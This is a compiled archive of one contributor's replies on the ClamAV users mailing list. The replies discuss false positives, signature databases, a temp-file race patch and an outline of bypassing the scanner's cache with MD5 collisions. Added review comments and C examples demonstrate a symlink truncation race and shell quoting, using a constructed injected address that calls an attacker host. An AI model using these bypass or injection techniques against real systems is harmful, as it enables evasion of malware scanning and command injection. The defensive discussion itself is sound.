Re: [Clamav-users] Need help with additional setup

2009-06-17 Thread Sarocet
Jonn Taylor wrote:
> I have been using clamav for several years and its been working well. 
> Recently a lot of emails have been getting through with viruses and 
> trojans. I am using CommuniGate Pro with the CGPAV filter to send the 
> email to be scanned. Are there any additional databases or configuration 
> that I could add to help?
>   

You could add sanesecurity databases.
http://www.sanesecurity.co.uk/databases.htm

___
Help us build a comprehensive ClamAV guide: visit http://wiki.clamav.net
http://www.clamav.net/support/ml


Re: [Clamav-users] false positives for

2009-06-17 Thread Sarocet
George Geller wrote:
> Recently, the scan has been giving me:
>
> sda1/Program Files/Microsoft Office/Office12/EXCEL.EXE: W32.Virut.Gen.D-163 FOUND
> sda1/Program Files/Microsoft Office/Office12/excelcnv.exe: W32.Virut.Gen.D-163 FOUND
> sda1/WINDOWS/SoftwareDistribution/Download/754e3b95d1b56e045c85bd49529d92b4/xlconv.cab: W32.Virut.Gen.D-163 FOUND
> sda1/WINDOWS/SoftwareDistribution/Download/488b87313a382b81238c79301c751bbd/excel.cab: W32.Virut.Gen.D-163 FOUND
> sda1/WINDOWS/Installer/789ce7.msp: W32.Virut.Gen.D-163 FOUND
> sda1/WINDOWS/Installer/789cfb.msp: W32.Virut.Gen.D-163 FOUND
>
> Since a full scan with Windows defender doesn't detect this issue and 
> http://virusscan.jotti.org/ shows that 789cfb.msp is virus free with all 
> programs except clam, I think this is a false positive.
>
> see http://wsms.wikiplanet.com/mediawiki/index.php/Clamscan for 
> additional details.
>
> Please advise.
>
> Thanks, George
>   
The third and fourth files contain the first and second, so it's the same.
Are they from reputable sources? Eg. are they digitally signed by Microsoft?

Just follow the usual procedure to report a false positive:
http://cgi.clamav.net/sendvirus.cgi

___
Help us build a comprehensive ClamAV guide: visit http://wiki.clamav.net
http://www.clamav.net/support/ml


Re: [Clamav-users] question about Clamav anti virus for old mac OS 9.2

2009-06-23 Thread Sarocet
G.W. Haywood wrote:
> Third, ClamAV _can_ be used to scan files on a machine.  But that's
> all it really does, it scans them and tells you if it thinks any of
> them might be infected.  That doesn't sound to me like what you want.
> I think you want something that will 'disinfect' them.  ClamAV doesn't
> do that.  It might tell you that a file is infected (it might even be
> right about that:) but it would then be up to you to decide what to do
> about it.  Now if you're scanning incoming mail, the decision is easy.
> You drop the mail and maybe send a message to the administrator of the
> system that is scanning the mail (NOT to the sender of the mail if you
> have any sense, because the address was most likely forged).  When you
> scan files on a computer, things are a little more complicated.  If a
> file is flagged as infected that might indeed mean that it's infected.
> You might then think that you have to do something to the file, to
> disinfect it.  Or maybe just delete it.  But it could also mean that
> it's an important system file that just happens to look like it's
> infected.  This would be what we call a 'false positive'.  You need to
> be able to make an educated guess (er, decision) about these things,
> to distinguish between genuine infections and false positives, because
> if you just romp around your operating system deleting all the files
> which trigger ClamAV (or any other virus scanner) you might find that
> you've done more damage to the operating system than the virus would
> ever have done.
>   

Well, other AV products face the same issue. They may ask you for your
decision in a message box instead, or take the decision for you. But all of
them have false positives, and they do sometimes break your OS by deciding
to remove some system file.



Julie wrote:
> I have been told by the computer engineers who have been helping me try to
> get to the bottom of this that the virus is contained in Microsoft Office
> Word 2001, and does not affect any other systems, so that sending emails is
> perfectly safe and will not endanger any other computer.
Yes. *As long as you don't send Office files with your email*.


Tom Shaw wrote:
> For 2004 and before, I can't remember what to 
> do for these older versions of MS Office but you can set up these to 
> warn you if a document contains VB Macros.
>   
It's a program option (Tools/Options). It said something like "Ask me
when I open files with macros" or "Disable files with macros".

___
Help us build a comprehensive ClamAV guide: visit http://wiki.clamav.net
http://www.clamav.net/support/ml


Re: [Clamav-users] Yet more clubbing of deceased equine.

2010-04-25 Thread Sarocet
Simon Hobson wrote:
> If anyone was running an old enough 0.95 version, then their software
> wouldn't have died, they would have seen update errors in their logs,
> and the fix would have been to change just one or two hostnames in
> their freshclam.conf. 

The new hostname updates would still have needed the kill signature.
Otherwise, you have the same problem as before, but with a different
hostname.

___
Help us build a comprehensive ClamAV guide: visit http://wiki.clamav.net
http://www.clamav.net/support/ml


Re: [Clamav-users] No debian woody support anymore?

2010-04-27 Thread Sarocet
Nathan Gibbs wrote:
> Here is what I absolutely do not like about this or agree with.
>
> The very possibility of there being a kill sig.  One specially crafted sig
> could kill the virus protection on every server & workstation in our company.
>
> Allowing the ClamAV Team to remotely nuke a level of our defenses is not
> acceptable.  ( ClamAV Team, correct me if I've got this wrong. )
>
> Obviously, we are betting the farm on solutions provided by these guys.
> However, the level of the farm's protection is my responsibility not theirs.
> With the public demo of a kill sig capability, I learn that they CAN & WILL
> mess with something that is my responsibility.
>
> Tactically my "kingdom" could be invaded by the ClamAV Team at any time, &
> they have already invaded others.
>
> That is a concept that I will never agree with.
>   
The ClamAV team didn't design the AV to stop on getting a special signature.
That signature could exist due to a bug that you decided not to fix (by not
updating/patching).
It was a clever use of a bug to disable the daemon.

___
Help us build a comprehensive ClamAV guide: visit http://wiki.clamav.net
http://www.clamav.net/support/ml


Re: [Clamav-users] Reload process

2010-05-24 Thread Sarocet
Török Edwin wrote:
> A simpler form of this is already implemented in 0.96 :)
>
> If a file is determined to be clean, its MD5 is added to an in-memory cache.
> When scanning a new file, its MD5 is computed and looked up in the
> cache. If found, it is considered clean.
> On DB reload the entire cache is cleared.
>
> Best regards,
> --Edwin
>   

Create two files with a colliding md5. One is innocuous, the other is
infected.
Send the clean one first. clamav will note it is clean and cache the md5.
Send the malicious one after a while. The hash is in the cache, so it
bypasses the AV.
Profit.

___
Help us build a comprehensive ClamAV guide: visit http://wiki.clamav.net
http://www.clamav.net/support/ml


Re: [Clamav-users] Reload process

2010-05-24 Thread Sarocet
Tomasz Kojm wrote:
> On Mon, 24 May 2010 22:22:46 +0200 Sarocet wrote:
>   
>> Create two files with a colliding md5. One is innocuous, the other is
>> infected.
>> Send the clean one first. clamav will note it is clean and cache the md5.
>> 
> The cache also checks file sizes
>
>   
>> Send the malicious one after a while. The hash in on the cache so it
>> bypasses the AV.
>> Profit.
>> 
> Good luck,
>   

I don't need to be specially lucky.
It's just one google search away.
http://www.mscs.dal.ca/~selinger/md5collision/

Download these two files:
http://www.mscs.dal.ca/~selinger/md5collision/hello.exe
http://www.mscs.dal.ca/~selinger/md5collision/erase.exe

Both files have the same filesize (6144) and md5
cdc47d670159eef60916ca03a9d4a007
The first one salutes the world. The second one erases the drive (or so
it says :)

Md5 is broken, guys.


___
Help us build a comprehensive ClamAV guide: visit http://wiki.clamav.net
http://www.clamav.net/support/ml


Re: [Clamav-users] Reload process

2010-05-24 Thread Sarocet
Tomasz Kojm wrote:
> These are poor examples, which are almost identical (only 6 bytes
> differ). Now, take a notepad.exe and create a malicious file with the
> same file size and MD5.
>
> Thanks,
>   

Read the scenario again.
Both files are created by the attacker. When the AV marks the first one as
clean, the second can then go unnoticed during a time window, even if the AV
would otherwise detect it.



___
Help us build a comprehensive ClamAV guide: visit http://wiki.clamav.net
http://www.clamav.net/support/ml


Re: [Clamav-users] Reload process

2010-05-25 Thread Sarocet
Tomasz Kojm wrote:
> This scenario doesn't make much sense to me. First of all, as I wrote in the
> previous email the files you provided as example are almost identical
> (they only differ in high nibbles of six bytes) and they share the same
> "payload", this means that both of them should be detected by the AV as
> malicious (in this case even using a single MD5 signature!). Due to the
> nature of MD5 weaknesses it's pretty much impossible to create a working
> malicious file that would have the same MD5 as, let's say notepad.exe.
>   
What if it's a self-extracting file? ClamAV detects the inner compressed
virus but not the executable header.

___
Help us build a comprehensive ClamAV guide: visit http://wiki.clamav.net
http://www.clamav.net/support/ml


Re: [Clamav-users] Reload process

2010-05-25 Thread Sarocet
Tomasz Kojm wrote:
> Sarocet wrote:
>   
>> What if it's an autoextracted file? ClamAV detects the inner compressed
>> virus
>> but not the executable heading.
>> 
> I don't get it.. if ClamAV detects a virus in any extracted file it
> marks the whole container infected
>   

Container extracts to Good_file
Container' extracts to Bad_file

md5(Container) = md5(Container')

ClamAV has a signature matching Bad_file.



Dennis wrote:
> A miracle occurs and the second file is executed and takes over the
> system.
I'm aware that there are other, easier ways to bypass the AV (eg. pack
it in an executable created just for that).

But how good is an AV software that sometimes doesn't find a virus it
knows about? :)

___
Help us build a comprehensive ClamAV guide: visit http://wiki.clamav.net
http://www.clamav.net/support/ml


Re: [Clamav-users] invalid magic number in header

2010-05-26 Thread Sarocet
Török Edwin wrote:
> On 05/25/2010 10:50 PM, Blackburn, Marvin wrote:
>   
>> I started getting this a couple of weeks ago and can't seem to find out
>> what is causing it
>>
>>  
>>
>> LibClamAV Warning: Incorrect magic number in optional header
>>
>> 
> Looks like a PE executable that is neither PE32 nor PE32+ ...
> That would only be loaded by win98 though AFAICT, see
> https://wwws.clamav.net/bugzilla/show_bug.cgi?id=119
>
> What file is it?
>
> Best regards,
> --Edwin
Maybe it is a 16 bit app (New Executable) ?
They will load up to Windows XP.


___
Help us build a comprehensive ClamAV guide: visit http://wiki.clamav.net
http://www.clamav.net/support/ml


Re: [Clamav-users] Problem with lha, lzh, uuencode and pgp files

2010-06-10 Thread Sarocet
DAVID BERTHIAU wrote:
>> None of the AVs detect that (and none should, it is an encrypted file):
>> http://www.virustotal.com/analisis/21c94279acf534fe49c32289dbe22cff12ec1006b09ef2e6ac31066e2d943cfb-1276179996
>> 
> Sorry, but I don't agree with you because my current system (trend micro 
> IWSS) detect everything as malicious (even on http://techlabs.bluecoat.com/ 
> and on http://securite-informatique.info/virus/eicar/)
>   
May I ask how it is able to decrypt such a file without the appropriate
private key?

___
Help us build a comprehensive ClamAV guide: visit http://wiki.clamav.net
http://www.clamav.net/support/ml


Re: [Clamav-users] TK53 Advisory #2: Multiple vulnerabilities in ClamAV

2007-12-31 Thread Sarocet

Chris wrote:

Saw this link at SANS today, anything to it?

http://seclists.org/fulldisclosure/2007/Dec/0625.html

Or is this a rehash of something already known about

I'm not a clam developer, but here's my view about them:

It lists three "vulnerabilities"
1- cli_gentempfd is vulnerable to a race condition attack.
It's a bug. O_EXCL needs to be added to libclamav/others.c line 847. Not 
fixed yet on trunk.

Attacker needs a local account.

I'm attaching a patch for it, so you can patch and rebuild your version.

2- ClamAV fails to properly check for base64-UUEncoded files, allowing 
bypassing of the scanner through the use of such files.

Not really a bug. Having ClamAV check those files would be an *enhancement*.

3- Sigtool utility overwrites files when utf16-decoding.
I'm not sure that it's a vulnerability. It's run by the user, who 
could be willing to overwrite it.
Adding an "overwriting file" warning would be a good idea, but refusing 
to write an existing file could break some scripts (and if you were to 
add an overwrite flag the "danger" is exactly the same as now).

Only dangerous if you have sigtool suid.
Index: libclamav/others.c
===
--- libclamav/others.c  (revision 3475)
+++ libclamav/others.c  (working copy)
@@ -492,7 +492,7 @@
 if(!*name)
return CL_EMEM;
 
-*fd = open(*name, O_RDWR|O_CREAT|O_TRUNC|O_BINARY, S_IRWXU);
+*fd = open(*name, O_RDWR|O_CREAT|O_TRUNC|O_BINARY|O_EXCL, S_IRWXU);
 if(*fd == -1) {
cli_errmsg("cli_gentempfd: Can't create temporary file %s: %s\n", 
*name, strerror(errno));
free(*name);
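Review bot: with O_EXCL added, open() now fails with EEXIST whenever anything already sits at the generated name, and the error path right below it (cli_errmsg, free(*name)) turns that into a failed scan; the caller should generate a fresh name and retry the open (mkstemp() does exactly that) so that a file planted at a predictable name costs the attacker a retry rather than costing you a scan. While here, S_IRWXU sets the execute bit on a temporary file that only needs S_IRUSR|S_IWUSR. Note also that the hunk header says line 492 while the text above points at line 847; one of the two is stale.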
___
Help us build a comprehensive ClamAV guide: visit http://wiki.clamav.net
http://lurker.clamav.net/list/clamav-users.html
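
The race the advisory describes, as an added example that is not ClamAV's code and not the patch above: a symlink planted at a predictable temporary name is opened first with the unpatched flags (O_CREAT|O_TRUNC) and then with O_EXCL, and the program reports whether the file the link points at survived. The demo directory under /tmp, the file names and the helper names are assumptions made for the example; the "secret" content is constructed.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* errno recorded by run_symlink_attack() right after the scanner's open(). */
int last_open_errno = 0;

/* Unpatched pattern: O_CREAT|O_TRUNC without O_EXCL. If the path already
 * exists as a symlink, open() follows it and truncates the link target. */
static int open_temp_unpatched(const char *path)
{
    return open(path, O_RDWR | O_CREAT | O_TRUNC, S_IRUSR | S_IWUSR);
}

/* Patched pattern: O_EXCL makes open() fail with EEXIST if anything (file
 * or symlink) already exists at the path, so the planted link is never
 * followed. A real fix still needs a retry with a fresh name on EEXIST. */
static int open_temp_exclusive(const char *path)
{
    return open(path, O_RDWR | O_CREAT | O_TRUNC | O_EXCL, S_IRUSR | S_IWUSR);
}

/* Simulate the race already lost: a local attacker has placed a symlink at
 * the predictable temp name, pointing at a file the scanner user can write.
 * Returns 1 if the victim file keeps its contents, 0 if it was truncated,
 * -1 on setup failure. Hypothetical demo directory under /tmp. */
int run_symlink_attack(int use_excl)
{
    char dir[256], victim[512], link[512];
    snprintf(dir, sizeof dir, "/tmp/gentempfd-demo-%ld-%d",
             (long)getpid(), use_excl);
    if (mkdir(dir, 0700) != 0 && errno != EEXIST) return -1;
    snprintf(victim, sizeof victim, "%s/victim", dir);
    snprintf(link, sizeof link, "%s/clamav-predictable.tmp", dir);

    /* The file the attacker wants clobbered (constructed sample content). */
    int vfd = open(victim, O_WRONLY | O_CREAT | O_TRUNC, S_IRUSR | S_IWUSR);
    if (vfd < 0) return -1;
    if (write(vfd, "secret", 6) != 6) { close(vfd); return -1; }
    close(vfd);

    /* Attacker's move: plant the symlink before the scanner creates its file. */
    unlink(link);
    if (symlink(victim, link) != 0) return -1;

    /* Scanner's move: create its "temporary" file at the predictable name. */
    int fd = use_excl ? open_temp_exclusive(link) : open_temp_unpatched(link);
    last_open_errno = (fd < 0) ? errno : 0;
    if (fd >= 0) close(fd);

    /* Did the victim keep its 6 bytes, or did O_TRUNC go through the link? */
    struct stat st;
    int survived = (stat(victim, &st) == 0 && st.st_size == 6);

    unlink(link);
    unlink(victim);
    rmdir(dir);
    return survived;
}

int main(void)
{
    printf("unpatched: victim survived = %d\n", run_symlink_attack(0));
    int ok = run_symlink_attack(1);
    printf("O_EXCL:    victim survived = %d (open errno %d, EEXIST is %d)\n",
           ok, last_open_errno, EEXIST);
    return 0;
}
```

The unpatched variant silently truncates the victim; the O_EXCL variant leaves it alone and reports EEXIST, which is the condition the scanner must then handle by picking another name rather than giving up.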


Re: [Clamav-users] TK53 Advisory #2: Multiple vulnerabilities in ClamAV

2008-01-01 Thread Sarocet
Ed Kasky wrote:
> At 06:07 AM Monday, 12/31/2007, you wrote -=>
>   
>> Chris wrote:
>> 
>>> Saw this link at SANS today, anything to it?
>>>
>>> http://seclists.org/fulldisclosure/2007/Dec/0625.html
>>>
>>> Or is this a rehash of something already known about
>>>   
>> I'm attaching a patch for it, so you can patch and rebuild your version.
>>
>>
>> --- libclamav/others.c(revision 3475)
>> +++ libclamav/others.c(working copy)
>> @@ -492,7 +492,7 @@
>> if(!*name)
>> return CL_EMEM;
>>
>> - *fd = open(*name, O_RDWR|O_CREAT|O_TRUNC|O_BINARY, S_IRWXU);
>> + *fd = open(*name, O_RDWR|O_CREAT|O_TRUNC|O_BINARY|O_EXCL, S_IRWXU);
>> if(*fd == -1) {
>> cli_errmsg("cli_gentempfd: Can't create temporary file %s: 
>> %s\n", *name, strerror(errno));
>> free(*name);
>> 
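Review bot: the quoted hunk's context lines (`if(!*name)`, `return CL_EMEM;`, `if(*fd == -1) {`) have lost the leading space that unified diff requires, and the cli_errmsg() call has been wrapped onto two lines, so the hunk no longer has the 7 old-side lines its `@@ -492,7 +492,7 @@` header promises; that is exactly what produces "malformed patch at line 4: if(!*name)". Restore the leading space on each context line and rejoin the wrapped call, or just add `| O_EXCL` to the open() by hand, since it is a one-line change.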
>
> FYI -
>
> When applying this patch, I get the following:
>
> "patch:  malformed patch at line 4: if(!*name)"
>
> Ed
>   

I don't have problems here. Which version are you using?
Note you can just manually add | O_EXCL. The patch was just for convenience.
___
Help us build a comprehensive ClamAV guide: visit http://wiki.clamav.net
http://lurker.clamav.net/list/clamav-users.html


Re: [Clamav-users] TK53 Advisory #2: Multiple vulnerabilities in ClamAV

2008-01-02 Thread Sarocet
Steve Holdoway wrote:
> IME patches always get mangled if included in an email, tabs to spaces, etc. 
> Putting it in an attachment keeps the internal formatting and usually works.
>
> Just my $0.02,
>
> Steve
>   
It was sent as an attachment, but inline in Ed Kasky's reply. Some e-mail 
clients will show the next multipart part inline if it's of text type.
___
Help us build a comprehensive ClamAV guide: visit http://wiki.clamav.net
http://lurker.clamav.net/list/clamav-users.html


Re: [Clamav-users] Official kubuntu 7.10 and wubi-cdboot.exe

2008-01-08 Thread Sarocet
Davide wrote:
> Hi, I am a little surprised because clamav finds a virus (Adware.Fakealert-21) 
> in
> the wubi-cdboot.exe of the official kubuntu-7.10-desktop-i386.iso
>
> My question is:
>
> A) It is a false positive ?
> B) It is a sad case ?
>
> Does anyone obtain the same result ? With another antivirus ? Does anyone
> know this Adware.Fakealert-21 ?
>
> I have posted the question at the kubuntu forum too:
>
> http://kubuntuforums.net/forums/index.php?topic=3090110.
Just a guess, but maybe kubuntu comes with some virus signatures / 
anti-virus code that is being detected as the virus?

Try mounting the iso and scanning the folders to narrow down where the 
problem is located.
___
Help us build a comprehensive ClamAV guide: visit http://wiki.clamav.net
http://lurker.clamav.net/list/clamav-users.html


Re: [Clamav-users] What's this? I can't believe it!

2008-01-20 Thread Sarocet
Dennis Peterson wrote:
> Nobody has actually tested the files to see if they are Windows executables 
> that I've seen. It is entirely possible they could be Linux executables. File 
> extensions don't mean much on a Linux system but it seems from this thread a 
> great way to pass around Linux viruses is to tack on a .exe extension and a 
> lot of people will ignore them to their great peril.
>
> dp
Well, if you ignore the file I don't see how it's going to run. 
Moreover, it's less likely you will write ./Foo.exe, as you're already 
assuming by the extension that it wouldn't work, so why do it?
___
Help us build a comprehensive ClamAV guide: visit http://wiki.clamav.net
http://lurker.clamav.net/list/clamav-users.html


Re: [Clamav-users] What's this? I can't believe it!

2008-01-21 Thread Sarocet
Dennis Peterson wrote:
>
> Some of us run mail equipment that sits in front of very large corporations 
> and it is incumbent upon us to know what we have so we don't have to make 
> excuses later.
>
> And some people, not you or I of course, are idiots and will do what ever is 
> possible to help blackhats make a buck.
>
> dp
>   
I agree with you. Some people deserve to have the right to +x anything 
taken away.
___
Help us build a comprehensive ClamAV guide: visit http://wiki.clamav.net
http://lurker.clamav.net/list/clamav-users.html


Re: [Clamav-users] Virus in clamav-0.92.1.tar.gz detected

2008-02-20 Thread Sarocet
Svetlana V.Vyslanko wrote:
> NOD32 detected virus Win32/Statik in clamav-0.92.1.tar.gz
>   
Win32/Statik is a heuristic signature. It's probably detecting some 
signatures in the clamav package.


___
Help us build a comprehensive ClamAV guide: visit http://wiki.clamav.net
http://lurker.clamav.net/list/clamav-users.html


Re: [Clamav-users] Memory usage for clamd is huge

2008-03-30 Thread Sarocet
Dennis Peterson wrote:
> I think he's suggesting that he'd prefer you not mail him because of 
> your idiot policy on outgoing virus scanning. I agree with him. I'm sure 
> I'm not the only one who would blacklist you right now because of your 
> policy if we knew your outgoing smtp IP.
>   
Scanning outgoing email is not something I think is that useful, and it's a 
nuisance for its users, but how does it deserve an SMTP ban?


PS: Note that he didn't explicitly say he was scanning outgoing mail.
___
Help us build a comprehensive ClamAV guide: visit http://wiki.clamav.net
http://lurker.clamav.net/list/clamav-users.html


Re: [Clamav-users] WARNING: Suspicious recipient address blocked

2008-04-14 Thread Sarocet
Michael Brown wrote:
> The | character is not allowed in any e-mail address because it's a Unix 
> shell reserved character.
>
> Here's a list right off the top of my head that are usually 
> blocked/disabled by just about every MTA out there.
>
>1. Control Characters
>2. Space
>3. !
>4. "
>5. #
>6. $
>7. %
>8. &
>9. (
>   10. )
>   11. *
>   12. ,
>   13. /
>   14. :
>   15. ;
>   16. <
>   17.  >
>   18. @ (when used more than once)
>   19. [
>   20. \
>   21. ]
>   22. |
>   23. DEL

The characters were passed to a popen call, thus had to be escaped for a shell.

The application shall quote the following characters if they are to 
represent themselves:

|  &  ;  <  >  (  )  $  `  \  "  '  

and the following may need to be quoted under certain circumstances: 
*   ?   [   #   ~   =   %

It's then up to $SENDMAIL_BIN to reject the address for having an embedded 
newline :)


___
Help us build a comprehensive ClamAV guide: visit http://wiki.clamav.net
http://lurker.clamav.net/list/clamav-users.html
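
The quoting rule discussed above, as an added example that is neither part of the original thread nor ClamAV's code: a single-quote quoting routine for POSIX shells, a metacharacter check usable for a reject policy, and a round trip through popen() showing that a quoted address containing `|`, `;` and `$(...)` reaches the command as one literal word. The function names and the sample addresses are constructed for the example.

```c
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Quote an arbitrary string so a POSIX shell treats it as a single literal
 * word: wrap it in single quotes and replace each embedded ' with '\''.
 * Returns a malloc'd string the caller must free, or NULL on failure. */
char *shell_quote(const char *s)
{
    size_t n = strlen(s), quotes = 0;
    for (size_t i = 0; i < n; i++)
        if (s[i] == '\'') quotes++;
    /* each ' becomes '\'' (3 extra bytes), plus 2 enclosing quotes and NUL */
    char *out = malloc(n + 3 * quotes + 3);
    if (!out) return NULL;
    char *p = out;
    *p++ = '\'';
    for (size_t i = 0; i < n; i++) {
        if (s[i] == '\'') { memcpy(p, "'\\''", 4); p += 4; }
        else *p++ = s[i];
    }
    *p++ = '\'';
    *p = '\0';
    return out;
}

/* Returns 1 if `s` contains any character from the POSIX list quoted in the
 * message above (both the "must quote" and "may need quoting" sets), plus
 * whitespace and newline. Suitable as a reject check for recipient strings
 * that will end up on a command line. */
int has_shell_metachar(const char *s)
{
    return strpbrk(s, "|&;<>()$`\\\"' \t\n*?[#~=%") != NULL;
}

/* Round trip: run `printf '%s' <quoted>` through popen() and return 1 if
 * the shell hands back exactly the original bytes, 0 otherwise. */
int roundtrip_through_shell(const char *s)
{
    char *q = shell_quote(s);
    if (!q) return 0;
    char cmd[4096];
    snprintf(cmd, sizeof cmd, "printf '%%s' %s", q);
    free(q);
    FILE *fp = popen(cmd, "r");
    if (!fp) return 0;
    char buf[4096] = {0};
    size_t got = fread(buf, 1, sizeof buf - 1, fp);
    pclose(fp);
    return got == strlen(s) && memcmp(buf, s, got) == 0;
}

int main(void)
{
    /* constructed hostile "address" of the kind the thread is about */
    const char *addr = "victim@example.com|mail attacker@evil.example; $(id)";
    char *q = shell_quote(addr);
    printf("quoted: %s\n", q);
    printf("round trip intact: %d\n", roundtrip_through_shell(addr));
    printf("would be rejected: %d\n", has_shell_metachar(addr));
    free(q);
    return 0;
}
```

Quoting makes the string survive the shell; rejecting anything that matches has_shell_metachar() is the simpler policy when, as here, a recipient address has no business containing those characters in the first place.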


Re: [Clamav-users] No supported Database

2008-04-16 Thread Sarocet
Brian Morrison wrote:
> Dennis Peterson wrote:
>   
>>> Yes, I realise that. I run clamd under user clamav, hence it's probably 
>>> easier to access /var/lib/clamav/* than it would be if owned by root.
>>>   
>> Why would that be? It is no more work to crack the root account than any 
>> other account. Nor any less. Hopefully too your clamav account has no 
>> shell defined.
>> 
>
> Indeed not.
>
> A local exploit is one thing, a local root exploit quite another. Now of 
> course it's more dangerous to run clamav as root, but for limiting write 
> access to the databases it would be better to have ownership as root. 
> Might not be worth it on balance, but I'm merely asking to see what the 
> developers' thought processes were rather than saying for sure what 
> would be better path to follow.
>   
We're talking about accessing a different account. That being the root 
one or a daemon one shouldn't make a difference. Perhaps you will trick 
user bin into visiting a malicious website?

The only scenario I can think of where it makes a difference would be if 
you had that part of the directory tree exported on nfs. You could have 
similar problems with other remote access tools which by default block 
root access, but most won't allow you in without a shell. And you 
shouldn't rely on the defaults without at least studying the config anyway.

However, if you know where it makes a difference, please share.

___
Help us build a comprehensive ClamAV guide: visit http://wiki.clamav.net
http://lurker.clamav.net/list/clamav-users.html


Re: [Clamav-users] List

2008-05-01 Thread Sarocet
Andy Loates wrote:
> Is this list still alive?
>
> Last post received on 7/4/08.
>
> No monthly email reminder today.
>
> Checked website, my user options for this list all seems ok.
>
> Hope to hear from someone!
>
> Andy Loates
>   
CCing you as it seems you don't receive from the list. Yes, it's still 
alive. I have received 367 mails to it since 7th April 2008 till your mail.
You can check the archives and see they're there. I don't know what happened 
to your subscription, though. Perhaps it's a silly configuration
mistake, or they're all being flagged as spam.
___
Help us build a comprehensive ClamAV guide: visit http://wiki.clamav.net
http://lurker.clamav.net/list/clamav-users.html


Re: [Clamav-users] Linux Virus on Vista VM

2008-05-15 Thread Sarocet
[EMAIL PROTECTED] wrote:
> Hello, 
>
> This is the virus that is found by ClamXav on Vista VM. McAfee does not find 
> it. It is only found by ClamXav. When I search the web for the string 
> nothing turns up. So someone please tell me what is this virus? Where does 
> it come from? Can it do any harm to macintosh and why no other av software 
> appears to be finding it? ClamXav uses the database of Clamav. 
>
> 564d488d-5af8-2b27-c071-26856caccd4f.vmem: Linux.Lionworm FOUND 
>
> Cheers 
I also found it, on the pagefile of a windows box which had no 
relationship with linux. It's too big to send anywhere (plus I don't 
know which data could be in there). But I saved the file and can provide 
what it's matching if needed.
I guess it's a too generic signature (though I'm quite lazy to see which 
signature it has).
___
Help us build a comprehensive ClamAV guide: visit http://wiki.clamav.net
http://lurker.clamav.net/list/clamav-users.html


Re: [Clamav-users] Freshclam not terminating correctly

2008-06-01 Thread Sarocet
Robert Blayzor wrote:
> I've been noticing a problem for quite some time now on our mirror  
> server. (I posted this issue to the devel list, but there have been no  
> responses).
>
> I'm noticing some buggy client behavior that seems it's from freshclam  
> clients.  Over time on our mirror we notice 1000's of connections can  
> build up over time with clients stuck in a half-opened state. (or half- 
> closed).  As clam becomes more popular and traffic picks up on the  
> mirrors, I notice more and more of these stuck clients.  It becomes  
> dangerous to the mirror at one point because if there are thousands of  
> these lingering around, they can run the server out of socket space.
>
> Basically what we see happen is that when Apache closes the connection  
> it will send the FIN to the client, sending it into FIN_WAIT_1, in  
> which case the client should answer with a FIN+ACK, but that doesn't  
> happen.  The client will respond with an ACK and zero sized window.
>   
Seems like a problem with the TCP stack to me. No client using normal 
sockets should be able to do that. Do you have some device (such as a 
firewall) in front of that machine which could be interfering? Could you 
fingerprint (p0f) which OS this activity comes from?
___
Help us build a comprehensive ClamAV guide: visit http://wiki.clamav.net
http://lurker.clamav.net/list/clamav-users.html


Re: [Clamav-users] Malformed database problem

2008-08-08 Thread Sarocet
Chambers, Phil wrote:
> I have looked at the source code and there are numerous places where it
> detects problems with signature, but they all generate the same failure
> message: "Malformed database".
>
> It is going to take me a very long time to patch the code to make it
> generate different error messages for each case where a signature can be
> malformed, so that I can diagnose my problem, but I see no alternative.
>   
Search for the text "Malformed database" and replace all occurrences by "File " 
__FILE__ " encountered a malformed database on line " STRINGIFY(__LINE__)

And globally define this:
  #define STRINGIFY2(x) #x
  #define STRINGIFY(x) STRINGIFY2(x)

___
Help us build a comprehensive ClamAV guide: visit http://wiki.clamav.net
http://www.clamav.net/support/ml


Re: [Clamav-users] Malware Scanning and blocking

2008-08-27 Thread Sarocet
Sain, David J. wrote:
> I want to setup a linux box with smoothwall, ipcop or some other
> opensource internet security application (preferably linux based) at
> home, but don't know how ClamAV might handle things like Antivirus 2008
> that make fraudulent claims and are considered malware.
>  
> I searched archives, but don't come up with hits on [ malware "antivirus
> 2008" ] which is a specific thing we deal with at work on a regular
> basis (I'm a consultant.  One firm we have a Sonicwall tz190 which
> blocks malware and virus' quite well, but sometimes at the expense of
> other things, like linux updates)
>  
> http://officialantiviruslab.com/?gclid=COu1jrK5rpUCFQ0MIgodJHujbw
> http://onlineantivirus2009.com/?gclid=COCnhYG5rpUCFRKAxgodpF7KbA
>
>
> Any thoughts?
>  
>
> Thank you,
>
> David
>   
See the recent 'Sanesecurity: new database' thread 
http://lurker.clamav.net/thread/20080818.151714.69360cff.en.html
It announces the addition of http://sanesecurity.co.uk/clamav/rogue.htm 
signatures for "known Rogue Anti-Virus software and also contains known 
Fake Videos/Codecs." Given the reference about fake news, I think 
'antivirus 2008' will be listed there.

___
Help us build a comprehensive ClamAV guide: visit http://wiki.clamav.net
http://www.clamav.net/support/ml


Re: [Clamav-users] ClamAV 0.94 build problem on Cygwin

2008-09-02 Thread Sarocet
René Berber wrote:
> "serious problems" ?  Only problem is the test I mentioned, passing a
> file descriptor is not supported under Cygwin as far as I know.
>   
I have no cygwin experience, but Windows *does* allow passing file 
descriptors to child process. Not in the same way as unix, but I'd find 
odd the cygwin guys didn't manage to adapt that, given that they were 
able to do much more complex things, such as emulating fork()
___
Help us build a comprehensive ClamAV guide: visit http://wiki.clamav.net
http://www.clamav.net/support/ml


Re: [Clamav-users] PUAs

2008-09-15 Thread Sarocet
Tilman Schmidt wrote:
>>> Sub-Type: IRC
>>> Description: IRC server based programs/malware
> I don't use IRC myself, but respectable people keep telling me
> that it's not for bad guys only, there are legitimate uses for
> it, and I should try it myself to see. So I am a bit reluctant
> to declare all IRC server based programs "possibly unwanted".
By IRC Server based programs do you mean IRC servers or IRC clients?
I thought it referred to the latter, but the phrase is strange.
You wouldn't want to forbid mIRC just as you wouldn't want to match
MSN Messenger or Yahoo! Messenger. Unless you have a "no chat" policy,
it's a perfectly legit program and banning it may trouble many users. *But*
many botnets use the mIRC program, having their code just as a mIRC script.
If the user knows that it has that program, it's ok. Not so much if it 
has been surreptitiously installed by a worm. I'd recommend downloading from
http://mirc.co.uk/ instead of sending by email, though.

___
Help us build a comprehensive ClamAV guide: visit http://wiki.clamav.net
http://www.clamav.net/support/ml


Re: [Clamav-users] How important are file extensions?

2008-09-25 Thread Sarocet
Tilman Schmidt schrieb:
> Roberto Ullfig schrieb:
>   
>> We'd like to rename the attachments with another suffix, 
